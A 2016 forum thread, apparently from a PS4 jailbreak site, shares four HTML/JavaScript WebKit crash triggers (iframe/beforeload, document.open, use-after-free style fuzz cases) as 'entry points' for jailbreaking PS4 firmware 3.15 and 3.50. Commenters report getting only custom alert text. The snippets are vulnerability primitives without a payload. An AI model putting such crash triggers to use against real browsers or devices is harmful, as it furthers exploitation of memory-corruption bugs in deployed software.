Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.

PS4 3.15 Firmware Entry Point for Testing from Zecoxao

PS4 Jailbreaking       Thread starter mcmrc1       Start date Apr 10, 2016 at 12:04 PM       150      
Status
Not open for further replies.
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code: 
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code: 
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the the source code from the Webkit from Sony ;)
3. Entry Point:
Code: 
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code: 
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
PS4 3.15 Firmware Entry Point.png
 
Click to expand...
mcmrc1
mcmrc1
mcmrc1
Sitting back, wait for hack...

Comments

I was playing around with zecoxao release, and got at least to make custom messages on 3.50FW. It's just the alert message only. I'm going to play around a bit more to see what else I can get it to do.

IMG_2253.JPG
 
for some reason an emulator that uses javascript, doesn't want to work or work at 10 fps. I dunno man really, I'm just goofing around with my setup trying to see what is exploitable and easy to get working right. I'm in no means or try to present myself as an elite. I know my way around(I'll leave it at that), but I'm sure with a little tweaking JSNES would run fine through the browser. As PS4 web browser is more capable than PS3 Browser. PS4 In theory will support canvasing:
Code: 
<canvas id="example" width="200" height="200">
This text is displayed if your browser does not support HTML5 Canvas.
</canvas>
Using JavaScript, you can draw on the canvas:

var example = document.getElementById('example');
var context = example.getContext('2d');
context.fillStyle = 'red';
context.fillRect(30, 30, 50, 50);

This code draws a red rectangle on the screen.

The Canvas API also provides save() and restore(), for saving and restoring all the canvas context’s attributes.
I have been looking around at my drive and having some nice experiences swapping files. There is a way to break the master toolchain, even compile your own .diffs
Researching this to the bone for hours on end. Looking at other peoples code, etc.
You would be suprised how just downright sloppy the security is at the higher levels. With enough research you can even compile your own toolchain. Get into their OWN CLANG. It's ridiculous. They didn't think the PS4 would get pwned so quickly. The guys that are putting their work out are doing amazing jobs and they will get closer everyday until they pwn it.
 
B7U3 C50SS said:
@GritNGrind You got a "hello world"? wow. can you go further in depth and write a tutorial on what you did so people can take it in a different dirrection?
Click to expand...

Custom TEXT only. I used zecoxao code with said FOO, and changed that to what ever I could think of and tried to run it and it did. Probably bad choice of words. ha! Just custom text only. I'm the same as DrPhuz, I'm just tinkering around with the guys that did the work, and seeing what all the limits it has. It's really nice to see all the work that's being done.
 
Man, would love too, but got to hit the sack (Damn real work!). I can't wait to get back on some of this tomorrow though. I can get it to do math, text boxes, etc...just simple stuff so far. Seems very limited on memory though. Maybe they can find a way to break out of that.

FullSizeRender (1).jpg
 
Status
Not open for further replies.

PSXHAX Categories

PS4 Jailbreak Status
PS5 Jailbreak Status

Latest Forum Topics

Share This Page

Back
Top